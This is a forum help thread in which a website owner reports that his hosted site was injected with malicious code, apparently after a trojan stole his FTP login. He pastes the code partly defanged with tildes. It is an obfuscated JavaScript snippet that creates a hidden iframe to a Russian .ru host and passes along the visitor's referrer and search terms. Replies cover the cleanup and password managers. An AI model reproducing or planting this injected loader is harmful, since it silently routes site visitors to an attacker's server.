Website Infected with Malware: imgur-com.mediaset.it.rottentomatoes

Hello,

This forum has always been helpful I was hoping someone could shed some light on a problem. A few days ago my PC was infected with a Trojan. Broni helped me to clean it up (a full day process). I checked again late last night and did a full deep scan with Malwarebytes - my PC is all clean.

Unfortunately, a website that I host at an ISP is not clean. It is possible that my PC's Trojan grabbed FTP access to my website and planted bad code. The ISP has been having some issues the past few days so the problem may not be related to my Trojan. Regardless, my website is now infected. The site appears unchanged and fully functional. The problem is every time you navigate to a new page the bottom of the browser flashes a brief message that the site is being routed/connected to some strange URL in Russia (see partial code in title).

I copied the actual code and placed it in a txt file which I attached. In the file Infection.txt I added a bunch of ~ to the start of lines 1 and 24 to hopefully prevent this code from causing any problems:

< ~~ script s~r~c
< ~~ i~f~r~a~m~e

Has anyone heard of this? What is it doing? Do you have suggestions how to get my site cleaned?

I have a level 2 support ticket at the ISP, but they have not yet responded with an answer after 12+ hours (very uncharacteristic of them - their support is usually A+++).

Thanks for your help!
Chip

P.S. Here is the code I was referring to, with tildes added after every < and throughout lines 1 and 24.

*******************

<~~s~c~r~i~p~t~ src= "~http~://~imgur-com~.mediaset.it.rottentomatoes-com.ExcellentBlender.ru:8080/cloob.com/cloob.com/google.com/opera.com/nih.gov.php" defer=" ">
Puu3cic = 'h^$!^)t)t($!p#@:^!/(/)#(i$(#m@g$u)r&&(-$@c)&o(m((^.(#m@!e))d()!i^&^!a&s)^@e)(@t@)^.((i!$#t^.!#r&$o$t$)(t^e&&n^&#t#)^o^#!m!!a&)#t$!#&o^!e)@$$s^)-@$c&@o$@&$#m!!!.$e(x!@c^)e$!(l)&l@)(e^(!n^t@b^^#l@#e(!^n!@#d!e)$r&@.@#&&r&@#u^'.replace(/\^|\!|\)|\(|@|&|\$|#/ig, '');
3Y5wegt = 'Y5wegtSa7y67xu';
4O9q7hm = document.createElement('iIf(rha(m(eI'.replace(/[Iku\(h]/g, ''));
5Y5wegt = 'Y5wegtSa7y67xu';
6Sa7y67xu = '';
7G5n9dq56 = '';
8Y5wegt = document.referrer;
9function Nmjhcpe2(A4jk0ry,Q71xj0ul){
10if (Y5wegt.indexOf(A4jk0ry) != -1){
11 Sa7y67xu=A4jk0ry;
12 Vwx8wmg = Y5wegt.indexOf(Q71xj0ul+'=');
13 if (Vwx8wmg != -1){
14 G5n9dq56 = Y5wegt.substring(Vwx8wmg+2).split('&')[0];
15 }
16}
17}
18//Nmjhcpe2('google.','q');Nmjhcpe2('search.yahoo.','p');Nmjhcpe2('ask.com','q');
19
20O9q7hm.style.visibility = 'h(@^$#i(&&d$@$!d$@e@n$!!#'.replace(/&|@|\(|#|\!|\$|\^|\)/ig, '');
21O9q7hm.src = Puu3cic+':28z0Q820z/2iQn2d2eQx2.7p2h7pQ?7j2a2=Q&zjQl7=z'.replace(/[zI72Q]/g, '')+Sa7y67xu+'&kl='+G5n9dq56;
22document.body.appendChild(O9q7hm);
<~/script>
<~~i~f~r~a~m~e~ style= "visibility: hidden;" src= "~http~://~imgur-com~.mediaset.it.rottentomatoes-com.excellentblender.ru:8080/index.php?ja=&jl=&kl= ">
<~html>
<~head><~/head>
<~body><~/body>
<~/html>
<~/iframe>
<~/body>

 

Hi broni,

I agree - they appear to be swamped with something. I was hoping that someone here could give me an idea of what this is and tips I could pass along how to fix it.

While I have your attention, you suggested I use Malwarebytes to check for spyware. Do you suggest I replace SpyBot which I currently use with the upgraded premium version of Malwarebytes that monitors and blocks attacks? The Trojan you helped me remove the other day slipped past SpyBot. Is it OK to have both or is it like AV s/w - you only want to have one?

Chip

 

OK, thanks.

 

Tony,

Wow, the situation sounds worse than I expected! My ISP confirmed that my site is the only one blessed with this little extra code. They than ran some code that searched every file on my site and replaced the injected code with nothing. The problem seems to be gone now. You gave me some other very useful tips regarding FTP etc., that I will explore with my ISP. I will keep you posted. Thanks again!

 

Hi broni and TonyT,

Sorry for the very delayed reply. This problem, thankfully, has been resolved. broni, can you change the status of the thread to resolved? My ISP found that malicious code was inserted into several files. They cleaned them up and I have been fine for about a week.

 

Hi Tony,

Thankfully I did not store any financial passwords in my browser. I also do not think I logged into any institution in the past week or two. Now that I am clean I will triple check.

The big pain was their hacking my FTP password and planting the code on my site. I would like to get your opinion (and other members') on password management. Kapersky recently came out with a password manager. I believe there are others. What is your opinion about using these to store passwords? Are the passwords stored in Firefox encrypted in any way?

Thanks again!
Chip